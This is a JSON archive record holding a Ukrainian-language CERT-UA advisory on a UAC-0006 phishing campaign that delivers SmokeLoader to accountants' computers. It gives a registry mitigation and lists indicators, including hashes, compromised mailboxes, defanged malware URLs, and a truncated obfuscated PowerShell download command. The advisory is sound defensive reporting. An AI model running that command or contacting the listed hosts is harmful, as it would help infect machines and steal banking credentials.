{
	"id": "c7b45510-6fef-4a38-81dd-678940b67bb0",
	"created_at": "2026-04-06T00:06:41.756445Z",
	"updated_at": "2026-04-10T03:24:58.559646Z",
	"deleted_at": null,
	"sha1_hash": "1c51f2b1fa2a29f6c8f93fbca0917b5d1aaebed2",
	"title": "CERT-UA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1535129,
	"plain_text": "CERT-UA\r\nArchived: 2026-04-05 13:08:01 UTC\r\nОновлено 12.05.2023\r\nЗагальна інформація\r\nУрядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA виявлено факт\r\nрозповсюдження електронних листів з використанням скомпрометованих облікових записів з темою\r\n\"рахунку/оплати\" із додатком у вигляді ZIP-архіву.\r\nЗгаданий ZIP-архів є файлом-поліглотом, що містить документ-приманку та JavaScript-файл\r\n\"pax_2023_AB1058..js\", який, використовуючи PowerShell, забезпечить завантаження та запуск\r\nвиконуваного файлу \"portable.exe\". Останній, у свою чергу, здійснить запуск шкідливої програми\r\nSmokeLoader (дата компіляції: 2023-04-24 11:45:17). Персистентність запуску SmokeLoader буде\r\nзабезпечено шляхом створення запланованого завдання, наприклад: \"C:\\Windows\\System32\\Tasks\\Firefox\r\nDefault Browser Agent D0D690C3E3EC0AB0\".\r\nДати реєстрації доменних імен, а також дата компіляції файлу свідчать про те, що кампанію ініційовано у\r\nквітні 2023 року. \r\nСлід зауважити, що активність групи UAC-0006 є фінансово-мотивованою та здійснювалась з 2013 року по\r\nлипень 2021 року. Типовий зловмисний задум полягає в ураженні ЕОМ бухгалтерів (за допомогою яких\r\nздійснюється забезпечення фінансової діяльності, наприклад, доступ до систем дистанційного\r\nбанківського обслуговування), викраденні автентифікаційних даних (логін, пароль, ключ/сертифікат) та\r\nстворенні несанкціонованих платежів (в деяких випадках з використанням HVNC боту, безпосередньо з\r\nураженої ЕОМ).\r\nУраховуючи той факт, що згаданою групою на етапі первинного ураження типово використовуються\r\nJavaScript-завантажувачі, тимчасово мінімізувати вірогідність ураження можливо шляхом блокування\r\nзапуску wscript.exe (Windows Script Host) на ЕОМ. Для цього, зокрема, в гілку реєстру \"\r\n{HKEY_CURRENT_USER,HKEY_LOCAL_MACHINE}\\Software\\Microsoft\\Windows Script Host\\Settings\"\r\nнеобхідно додати запис \"Enabled\" (тип: DWORD) зі значенням \"0\". \r\nІндикатори кіберзагроз\r\nФайли:\r\n3de79fc46c7f32807397309d52001b25  352974cfdf1a7e182180f8c813a159ae44bb35268d76fae91ab64139be9200bd\r\nef40fca1afe6ae5320cf396a736718ad  3c4440dde25ead7074bf3bf90aed31844310c3f1da90ff7e20922fad4c3eab25\r\n12f77d1be4344fb88f1093550b092ab6  f4e72685fb3efa5bad200451d36c7d1e72a94515c515bdbb09c00254dca289ea\r\n68bc4ce7b6c15f1f5a40e361b2214fce  24471f2fd20e7386aa533b51bf851cdeb9ee0750a615273c6004b86e463d36d2\r\nhttps://cert.gov.ua/article/4555802\r\nPage 1 of 3\n\n8f05b8ea15b88c441219cf8310010df0\r\ncd0226a2b9c38ab99f2bbe4461b7fc9d4b07faafbe1ccc53d92bf08d1903a8ae\r\n185efba2b3bf87e7d49a05ebb0ad51147ee1ab4270a5293e7151a6321ce17962022802f72a7d58c264e43a016a8a49a4\r\nХостові:\r\n%TMP%\\gEq94.exe\r\n%TMP%\\gE94.exe\r\n%LOCALAPPDATA%\\TempgE94.exe\r\n%LOCALAPPDATA%\\TempgEq94.exe\r\n%APPDATA%\\cajvchh (назва файлу змінна)\r\n\"C:\\Windows\\System32\\WScript.exe\" \"%USERPROFILE%\\Downloads\\pax_2023_AB1058..js\"\r\n\"C:\\Windows\\System32\\cmd.exe\" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We\r\nC:\\Windows\\System32\\Tasks\\Firefox Default Browser Agent D0D690C3E3EC0AB0\r\nFirefox Default Browser Agent D0D690C3E3EC0AB0\r\nМережеві:\r\nbeliy@atl.ua (скомпрометований обліковий запис)\r\ninbox6@dl.kr-admin.gov.ua (скомпрометований обліковий запис)\r\nnvn@mayak.dp.ua (скомпрометований обліковий запис)\r\nhXXp://homospoison[.]ru/one/portable.exe\r\nhXXp://3dstore[.]pro/\r\nhXXp://balkimotion[.]ru/\r\nhXXp://coudzoom[.]ru/\r\nhXXp://criticalosl[.]tech/\r\nhXXp://humanitarydp[.]ug/\r\nhXXp://ipodromlan[.]ru/\r\nhXXp://lamazone[.]site/\r\nhXXp://ligaspace[.]ru/\r\nhXXp://maximprofile[.]net/\r\nhXXp://redport80[.]ru/\r\nhXXp://shopersport[.]ru/\r\nhXXp://sindoproperty[.]org/\r\nhXXp://superboler[.]com/\r\nhXXp://zaliphone[.]com/\r\n3dstore[.]pro\r\nbalkimotion[.]ru\r\ncoudzoom[.]ru\r\ncriticalosl[.]tech\r\nhomospoison[.]ru\r\nhumanitarydp[.]ug\r\nipodromlan[.]ru\r\nlamazone[.]site\r\nligaspace[.]ru\r\nmaximprofile[.]net\r\nredport80[.]ru\r\nhttps://cert.gov.ua/article/4555802\r\nPage 2 of 3\n\nshopersport[.]ru\r\nsindoproperty[.]org\r\nsuperboler[.]com\r\nzaliphone[.]com\r\n193[.]106.175.177\r\nGoogle Chrome (User-Agent)\r\nГрафічні зображення\r\nSource: https://cert.gov.ua/article/4555802\r\nhttps://cert.gov.ua/article/4555802\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://cert.gov.ua/article/4555802"
	],
	"report_names": [
		"4555802"
	],
	"threat_actors": [
		{
			"id": "078f7b2a-4e1c-4843-b7cd-353331cd2260",
			"created_at": "2023-11-21T02:00:07.359148Z",
			"updated_at": "2026-04-10T02:00:03.467054Z",
			"deleted_at": null,
			"main_name": "UAC-0006",
			"aliases": [],
			"source_name": "MISPGALAXY:UAC-0006",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434001,
	"ts_updated_at": 1775791498,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1c51f2b1fa2a29f6c8f93fbca0917b5d1aaebed2.pdf",
		"text": "https://archive.orkl.eu/1c51f2b1fa2a29f6c8f93fbca0917b5d1aaebed2.txt",
		"img": "https://archive.orkl.eu/1c51f2b1fa2a29f6c8f93fbca0917b5d1aaebed2.jpg"
	}
}